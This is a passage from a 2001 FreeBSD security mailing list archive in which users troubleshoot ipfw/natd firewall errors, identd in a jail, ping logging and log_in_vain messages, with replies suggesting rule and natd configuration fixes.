Received: from mta05-svc.ntlworld.com (mta05-svc.ntlworld.com [62.253.162.45])
	by hub.freebsd.org (Postfix) with ESMTP id C61E537B417
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 23:19:27 -0800 (PST)
Received: from there ([80.4.125.7]) by mta05-svc.ntlworld.com
          (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP
          id <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there>
          for <freebsd-security@FreeBSD.ORG>;
          Thu, 6 Dec 2001 07:19:26 +0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Mike D <d01f1n@yahoo.com>
To: freebsd-security@FreeBSD.ORG
Subject: ipfw/natd problem?
Date: Thu, 6 Dec 2001 07:19:14 +0000
X-Mailer: KMail [version 1.3]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I'm getting this error all the time since I've set up my FreeBSD 4.4 with 
ipfw and natd as part of the kernel.

Dec  6 00:03:09 host4 natd[195]: failed to write packet back (Permission 
denied)
Dec  6 00:13:53 host4 last message repeated 26 times

This is the rules list I have for ipfw:

00050   24    1194 allow ip from any to any via lo0
00051    0       0 deny ip from any to 127.0.0.0/8
00052    0       0 deny ip from 127.0.0.0/8 to any
00060 1098  282242 divert 8668 ip from any to any via xl1
00100    0       0 allow ip from any to any via lo0
00100 4840 3315967 allow ip from any to any via xl0
00200    0       0 deny ip from any to 127.0.0.0/8
00200    1     540 allow udp from 194.168.8.100 53 to any in recv xl1
00201   37   10088 allow udp from 194.168.4.100 53 to any in recv xl1
00202    1      59 allow udp from any to 194.168.8.100 53 out xmit xl1
00203   37    2429 allow udp from any to 194.168.4.100 53 out xmit xl1
00300    0       0 deny ip from 127.0.0.0/8 to any
00400   39    2232 allow tcp from any to any out xmit xl1 setup
00401  933  257294 allow tcp from any to any via xl1 established
00450    0       0 allow tcp from any to any 22 setup
50000   50    9600 unreach host ip from any to any
65535    1     328 deny ip from any to any

Any suggestions as to what it could be? I'm really supmped - any help would 
be appreciated.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 23:32:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from harrier.prod.itd.earthlink.net (harrier.mail.pas.earthlink.net [207.217.120.12])
	by hub.freebsd.org (Postfix) with ESMTP id C8AFF37B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 23:32:32 -0800 (PST)
Received: from dialup-209.247.143.1.dial1.sanjose1.level3.net ([209.247.143.1] helo=blossom.cjclark.org)
	by harrier.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Bt1D-0004yr-00; Wed, 05 Dec 2001 23:32:32 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB67WT606952;
	Wed, 5 Dec 2001 23:32:29 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 5 Dec 2001 23:32:29 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Mike D <d01f1n@yahoo.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw/natd problem?
Message-ID: <20011205233229.R3061@blossom.cjclark.org>
References: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there>; from d01f1n@yahoo.com on Thu, Dec 06, 2001 at 07:19:14AM +0000
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, Dec 06, 2001 at 07:19:14AM +0000, Mike D wrote:
> I'm getting this error all the time since I've set up my FreeBSD 4.4 with 
> ipfw and natd as part of the kernel.
> 
> Dec  6 00:03:09 host4 natd[195]: failed to write packet back (Permission 
> denied)
> Dec  6 00:13:53 host4 last message repeated 26 times
> 
> This is the rules list I have for ipfw:
> 
> 00050   24    1194 allow ip from any to any via lo0
> 00051    0       0 deny ip from any to 127.0.0.0/8
> 00052    0       0 deny ip from 127.0.0.0/8 to any
> 00060 1098  282242 divert 8668 ip from any to any via xl1
> 00100    0       0 allow ip from any to any via lo0
> 00100 4840 3315967 allow ip from any to any via xl0
> 00200    0       0 deny ip from any to 127.0.0.0/8
> 00200    1     540 allow udp from 194.168.8.100 53 to any in recv xl1
> 00201   37   10088 allow udp from 194.168.4.100 53 to any in recv xl1
> 00202    1      59 allow udp from any to 194.168.8.100 53 out xmit xl1
> 00203   37    2429 allow udp from any to 194.168.4.100 53 out xmit xl1
> 00300    0       0 deny ip from 127.0.0.0/8 to any
> 00400   39    2232 allow tcp from any to any out xmit xl1 setup
> 00401  933  257294 allow tcp from any to any via xl1 established
> 00450    0       0 allow tcp from any to any 22 setup
> 50000   50    9600 unreach host ip from any to any

There they are. Any of those that went through natd(8) and hit this
rule will cause that.

> 65535    1     328 deny ip from any to any
> 
> Any suggestions as to what it could be? I'm really supmped - any help would 
> be appreciated.

-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 23:35:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mta01-svc.ntlworld.com (mta01-svc.ntlworld.com [62.253.162.41])
	by hub.freebsd.org (Postfix) with ESMTP id 808DE37B419
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 23:35:10 -0800 (PST)
Received: from there ([80.4.125.7]) by mta01-svc.ntlworld.com
          (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP
          id <20011206073509.QFVP16633.mta01-svc.ntlworld.com@there>
          for <freebsd-security@FreeBSD.ORG>;
          Thu, 6 Dec 2001 07:35:09 +0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Mike D <d01f1n@yahoo.com>
To: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw/natd problem?
Date: Thu, 6 Dec 2001 07:34:57 +0000
X-Mailer: KMail [version 1.3]
References: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there> <20011205233229.R3061@blossom.cjclark.org>
In-Reply-To: <20011205233229.R3061@blossom.cjclark.org>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <20011206073509.QFVP16633.mta01-svc.ntlworld.com@there>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Anyway I can suppress these / log them instead? Should I be getting them at 
all - have I forgotten to configure something for natd?

On Thursday 06 December 2001 7:32 am, Crist J . Clark wrote:
> On Thu, Dec 06, 2001 at 07:19:14AM +0000, Mike D wrote:
> > I'm getting this error all the time since I've set up my FreeBSD 4.4 with
> > ipfw and natd as part of the kernel.
> >
> > Dec  6 00:03:09 host4 natd[195]: failed to write packet back (Permission
> > denied)
> > Dec  6 00:13:53 host4 last message repeated 26 times
> >
> > This is the rules list I have for ipfw:
> >
> > 00050   24    1194 allow ip from any to any via lo0
> > 00051    0       0 deny ip from any to 127.0.0.0/8
> > 00052    0       0 deny ip from 127.0.0.0/8 to any
> > 00060 1098  282242 divert 8668 ip from any to any via xl1
> > 00100    0       0 allow ip from any to any via lo0
> > 00100 4840 3315967 allow ip from any to any via xl0
> > 00200    0       0 deny ip from any to 127.0.0.0/8
> > 00200    1     540 allow udp from 194.168.8.100 53 to any in recv xl1
> > 00201   37   10088 allow udp from 194.168.4.100 53 to any in recv xl1
> > 00202    1      59 allow udp from any to 194.168.8.100 53 out xmit xl1
> > 00203   37    2429 allow udp from any to 194.168.4.100 53 out xmit xl1
> > 00300    0       0 deny ip from 127.0.0.0/8 to any
> > 00400   39    2232 allow tcp from any to any out xmit xl1 setup
> > 00401  933  257294 allow tcp from any to any via xl1 established
> > 00450    0       0 allow tcp from any to any 22 setup
> > 50000   50    9600 unreach host ip from any to any
>
> There they are. Any of those that went through natd(8) and hit this
> rule will cause that.
>
> > 65535    1     328 deny ip from any to any
> >
> > Any suggestions as to what it could be? I'm really supmped - any help
> > would be appreciated.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  0: 6:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47])
	by hub.freebsd.org (Postfix) with ESMTP
	id DDD0737B41D; Thu,  6 Dec 2001 00:06:12 -0800 (PST)
Received: from there ([80.4.125.7]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP
          id <20011206080612.KYRB10846.mta07-svc.ntlworld.com@there>;
          Thu, 6 Dec 2001 08:06:12 +0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Mike D <d01f1n@yahoo.com>
To: freebsd-hackers@FreeBSD.ORG
Subject: cable modem connection problem
Date: Thu, 6 Dec 2001 08:05:59 +0000
X-Mailer: KMail [version 1.3]
Cc: freebsd-security@FreeBSD.ORG
References: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there> <20011205233229.R3061@blossom.cjclark.org>
In-Reply-To: <20011205233229.R3061@blossom.cjclark.org>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <20011206080612.KYRB10846.mta07-svc.ntlworld.com@there>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I have a set up where my FreeBSD 4.4 box is acting as a firewall and gateway 
between a cable modem on xl1 and my home net on xl0.

I have a pretty tight rules list and don't have that many procs running 
(ipfw, natd, mysql, tomcat - that's it!)

It seems that after approx 10 hours the connection REALLY slows down, most 
connection attempts on other ports (e.g. 110) time out and I have to reboot 
the box. After the reboot everything is back to normal.

If you have *any* thoughts at all as to what this could be - please let me 
know, I'm getting pretty desperate.

many thanks in advance!

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  0:19:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12])
	by hub.freebsd.org (Postfix) with ESMTP id 3CC2E37B417
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 00:19:46 -0800 (PST)
Received: (from root@localhost)
	by mailhost.freebsd.lublin.pl (8.11.6/8.11.4) id fB68Jh627243;
	Thu, 6 Dec 2001 09:19:43 +0100 (CET)
	(envelope-from venglin@freebsd.lublin.pl)
Received: from there (IDENT:venglin@clitoris.czuby.net [212.182.126.2])
	by mailhost.freebsd.lublin.pl (8.11.6/8.11.4av) with SMTP id fB68Jff27235;
	Thu, 6 Dec 2001 09:19:41 +0100 (CET)
	(envelope-from venglin@freebsd.lublin.pl)
Message-Id: <200112060819.fB68Jff27235@mailhost.freebsd.lublin.pl>
Content-Type: text/plain;
  charset="iso-8859-2"
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Organization: czuby.net
To: "alexus" <ml@db.nexgen.com>
Subject: Re: identd inside of jail
Date: Thu, 6 Dec 2001 09:19:41 +0100
X-Mailer: KMail [version 1.3.1]
References: <000901c17de6$c6a49730$0d00a8c0@alexus>
In-Reply-To: <000901c17de6$c6a49730$0d00a8c0@alexus>
Cc: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thursday 06 December 2001 00:44, you wrote:
> did anyone sucseed on making identd (from inetd) or any other identd to
> work inside of jail?

use ident2 from ports. it works fine in jail.

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  0:37:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from albatross.prod.itd.earthlink.net (albatross.mail.pas.earthlink.net [207.217.120.120])
	by hub.freebsd.org (Postfix) with ESMTP id 0BEEA37B417
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 00:37:27 -0800 (PST)
Received: from dialup-209.247.143.1.dial1.sanjose1.level3.net ([209.247.143.1] helo=blossom.cjclark.org)
	by albatross.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Bu1y-00031W-00; Thu, 06 Dec 2001 00:37:22 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB68bJd07191;
	Thu, 6 Dec 2001 00:37:19 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 6 Dec 2001 00:37:19 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: alexus <ml@db.nexgen.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: identd inside of jail
Message-ID: <20011206003719.S3061@blossom.cjclark.org>
References: <000901c17de6$c6a49730$0d00a8c0@alexus>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <000901c17de6$c6a49730$0d00a8c0@alexus>; from ml@db.nexgen.com on Wed, Dec 05, 2001 at 06:44:26PM -0500
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 06:44:26PM -0500, alexus wrote:
> Hello
> 
> I'm posting on this thread on this list due to jail itself is a security
> related issue, if this is wrong list i'll repost it on another list.
> 
> did anyone sucseed on making identd (from inetd) or any other identd to work
> inside of jail?

I don't think the auth service in inetd(8) will work in a jail. I
believe the "net.inet.tcp.getcred" sysctl(3) fails.

> the identd itself is working, however to make it work for outside world too
> i put forward for port 113 using natd
> 
> su-2.05# grep 113 /etc/natd.conf
> redirect_port tcp jail:113 113

And running it through a NATing gateway opens up a whole bunch of other
issues that have nothing to do with jail(8).
-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  0:46:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from swan.prod.itd.earthlink.net (swan.mail.pas.earthlink.net [207.217.120.123])
	by hub.freebsd.org (Postfix) with ESMTP id 5A64037B405
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 00:46:50 -0800 (PST)
Received: from dialup-209.247.143.1.dial1.sanjose1.level3.net ([209.247.143.1] helo=blossom.cjclark.org)
	by swan.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16BuB2-0003Bp-00; Thu, 06 Dec 2001 00:46:44 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB68kge07238;
	Thu, 6 Dec 2001 00:46:42 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 6 Dec 2001 00:46:42 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Mike D <d01f1n@yahoo.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw/natd problem?
Message-ID: <20011206004642.T3061@blossom.cjclark.org>
References: <20011206071926.QTHW27606.mta05-svc.ntlworld.com@there> <20011205233229.R3061@blossom.cjclark.org> <20011206073509.QFVP16633.mta01-svc.ntlworld.com@there>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011206073509.QFVP16633.mta01-svc.ntlworld.com@there>; from d01f1n@yahoo.com on Thu, Dec 06, 2001 at 07:34:57AM +0000
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, Dec 06, 2001 at 07:34:57AM +0000, Mike D wrote:
> Anyway I can suppress these / log them instead? Should I be getting them at 
> all - have I forgotten to configure something for natd?

It means that packets are getting blocked after they go through
natd(8). You can log them by adding 'log' to rule 50000. But that
won't stop the messages you are seeing. You can stop the messages by
blocking the offending packets before the divert(4) rule. If you don't
want to do that, look for 'log_denied' in natd(8).

> On Thursday 06 December 2001 7:32 am, Crist J . Clark wrote:
> > On Thu, Dec 06, 2001 at 07:19:14AM +0000, Mike D wrote:
> > > I'm getting this error all the time since I've set up my FreeBSD 4.4 with
> > > ipfw and natd as part of the kernel.
> > >
> > > Dec  6 00:03:09 host4 natd[195]: failed to write packet back (Permission
> > > denied)
> > > Dec  6 00:13:53 host4 last message repeated 26 times
> > >
> > > This is the rules list I have for ipfw:
> > >
> > > 00050   24    1194 allow ip from any to any via lo0
> > > 00051    0       0 deny ip from any to 127.0.0.0/8
> > > 00052    0       0 deny ip from 127.0.0.0/8 to any
> > > 00060 1098  282242 divert 8668 ip from any to any via xl1
> > > 00100    0       0 allow ip from any to any via lo0
> > > 00100 4840 3315967 allow ip from any to any via xl0
> > > 00200    0       0 deny ip from any to 127.0.0.0/8
> > > 00200    1     540 allow udp from 194.168.8.100 53 to any in recv xl1
> > > 00201   37   10088 allow udp from 194.168.4.100 53 to any in recv xl1
> > > 00202    1      59 allow udp from any to 194.168.8.100 53 out xmit xl1
> > > 00203   37    2429 allow udp from any to 194.168.4.100 53 out xmit xl1
> > > 00300    0       0 deny ip from 127.0.0.0/8 to any
> > > 00400   39    2232 allow tcp from any to any out xmit xl1 setup
> > > 00401  933  257294 allow tcp from any to any via xl1 established
> > > 00450    0       0 allow tcp from any to any 22 setup
> > > 50000   50    9600 unreach host ip from any to any
> >
> > There they are. Any of those that went through natd(8) and hit this
> > rule will cause that.
> >
> > > 65535    1     328 deny ip from any to any
> > >
> > > Any suggestions as to what it could be? I'm really supmped - any help
> > > would be appreciated.
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  2:31:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gramsc1.dyndns.org (h00609774e769.ne.mediaone.net [24.91.224.187])
	by hub.freebsd.org (Postfix) with ESMTP id 6B91837B41A
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 02:31:18 -0800 (PST)
Received: from there (tr0tsky [10.0.0.4])
	by gramsc1.dyndns.org (8.12.1/8.12.1) with SMTP id fB6AV6Fp016959
	for <freebsd-security@freebsd.org>; Thu, 6 Dec 2001 05:31:07 -0500 (EST)?g
	(envelope-from resopmok@gramsc1.dyndns.org)�
Message-Id: <200112061031.fB6AV6Fp016959@gramsc1.dyndns.org>
Content-Type: text/plain;
  charset="iso-8859-1"
From: Chris Thomas <resopmok@gramsc1.dyndns.org>
Reply-To: resopmok@gramsc1.dyndns.org
To: freebsd-security@freebsd.org
Subject: Re: (WOT) Re: the best edited picture ever
Date: Thu, 6 Dec 2001 05:31:06 -0500
X-Mailer: KMail [version 1.3.1]
References: <20011206044206.GD12011@hq.newdream.net> <Pine.BSF.3.96.1011206155044.11905C-100000@gaia.nimnet.asn.au> <20011206054226.GA20863@hq.newdream.net>
In-Reply-To: <20011206054226.GA20863@hq.newdream.net>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

folks-
	I'm very sorry to have spammed the list, and I certainly did not mean to 
incite a flame war over it.  It was purely an accident on my part; I meant to 
send this email to a friend of mine and didn't notice I had done the wrong 
thing until I came back and saw 20 messages on the topic.  I receive lots of 
valuable information through this list, and an incident such as this will not 
happen again.  My deepest apologies.

-chris

On Thursday 06 December 2001 12:42 am, you wrote:
> Ian Smith wrote:
> > [on topic?  I'd actually like to know what can be done with majordomo
> > to accomplish it; we're having just this problem with a list run from
> > here]
>
> well it looks like hub.freebsd.org is running postfix according to the
> smtp banner, so assuming no one at freebsd wants to receive this type of
> thing, it would be pretty trivial to block most (but not all) of this
> type of stuff with regex checks. this has the advantage of getting rid
> of this junk as early as possible.
>
> assuming pcre body_checks, something like this might work (this is just
> from the postfix-users list; i haven't tested it personally, but
> something like this should work).  something similar could be done if
> POSIX regexes are used instead....
>
> (sorry for the long line)
>
> /^(Content-Disposition: attachment;.*|
> Content-Type:.*|(\t|)+)(file)?name="?.*\.(lnk|hta|com|pif|vbs|vbe|js|jse|ex
>e|bat|cmd|vxd|scr|shm|dll)"?$/ REJECT
>
> however this would apply to all mail coming into the server... (although
> god knows why anyone at freebsd.org would want to receive this type of
> attachment, especially not zipped or tarred /gzipped.
>
> obviously this would be up to whoever admins the freebsd mail servers...
>
> i haven't used majordomo, so i'm not sure how to do this specifically
> with that software.
>
> > I don't agree that these lists need the large overhead of moderation,
> > if a (hopefully) simple technical fix can drastically reduce the
> > volume of this crap in any and all freebsd lists - including stripping
> > HTML mail.
>
> hopefully so. who is 'officially' in charge of this list?  perhaps they
> could let us know if anything can be done regarding this?

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  4: 8:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP
	id 7E54737B417; Thu,  6 Dec 2001 04:08:26 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP
	id 0A8F0BAE4; Thu,  6 Dec 2001 10:08:19 -0200 (BRST)
Message-ID: <00c001c17e4e$f14cb6d0$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: "Crist J . Clark" <cjc@FreeBSD.ORG>
Cc: <security@FreeBSD.ORG>
References: <02f601c17dab$85743670$2aa8a8c0@melim.com.br> <20011205135449.E3061@blossom.cjclark.org>
Subject: Re: Securty logs
Date: Thu, 6 Dec 2001 10:10:06 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi Cris,

> > If I have icmp 8,0 denied for external computers, when
> > someone pings, it create an entry in security log file:
> >
> > Dec  5 14:01:12 server /kernel: ipfw: 3000 Deny ICMP:8.0 62.211.157.214
> > 255.255.255.255 in via fxp0
> >
> > But if such computer give a flood attack, I think it will
> > create the same entry.
> >
> > How can I identify if an entry in security log file was creted
> > by simple ping or by a flood attack?
>
> By how many of those log entries you get. Each packet will generate a
> message.

I did a test:

I pinged for the machine and typed Ctrl-C.
The pind returned 9 packets sent/0 packets received.

In the security log of the target machine it shows just one line.

I have FreeBSD-4.3 seted the follow options:

- Kernel
   options IPFIREWALL
   options IPFIREWALL_VERBOSE
   options IPFIREWALL_VERBOSE_LIMIT=500
   options IPFIREWALL_DEFAULT_TO_ACCEPT

- /etc/rc.conf
    firewall_enable="YES"
    firewall_logging="YES"

- Ipfw rules
    The rules that deny some service are seted with deny log option.

Do I need to configure anything diferent or some option more?

Thank�s
Ronan


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  4:50:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shikima.mine.nu (pc1-card4-0-cust77.cdf.cable.ntl.com [62.252.49.77])
	by hub.freebsd.org (Postfix) with ESMTP id EC08E37B416
	for <security@freebsd.org>; Thu,  6 Dec 2001 04:50:17 -0800 (PST)
Received: from rasputin by shikima.mine.nu with local (Exim 3.33 #1)
	id 16By0m-000Ipk-00
	for security@freebsd.org; Thu, 06 Dec 2001 12:52:24 +0000
Date: Thu, 6 Dec 2001 12:52:24 +0000
From: Rasputin <rasputin@submonkey.net>
To: security@freebsd.org
Subject: ipf and log_in_vain
Message-ID: <20011206125224.A72358@shikima.mine.nu>
Reply-To: Rasputin <rasputin@submonkey.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Hi there

I've been getting *buttloads* of messages like:

Connection attempt to UDP 62.252.49.77:2716 from 194.168.4.100:53
Connection attempt to UDP 62.252.49.77:2736 from 194.168.4.100:53
Connection attempt to UDP 62.252.49.77:2759 from 194.168.8.100:53
Connection attempt to UDP 62.252.49.77:2779 from 194.168.8.100:53

for ages, and decided it's time to fix it
(for one thing it makes the daily security mails from cron hard to read through)

I understand this is down to log_in_vain sysctls, but since I run ipf I wonder
why the kernel is seeing these at all?

My understanding is that ipf should be keeping these packets out (possibly logging them
itself) before they get into the part of the kernel that handles log_in_vain.

If that's the case, I'm assuming that the reason they manage to pass through is
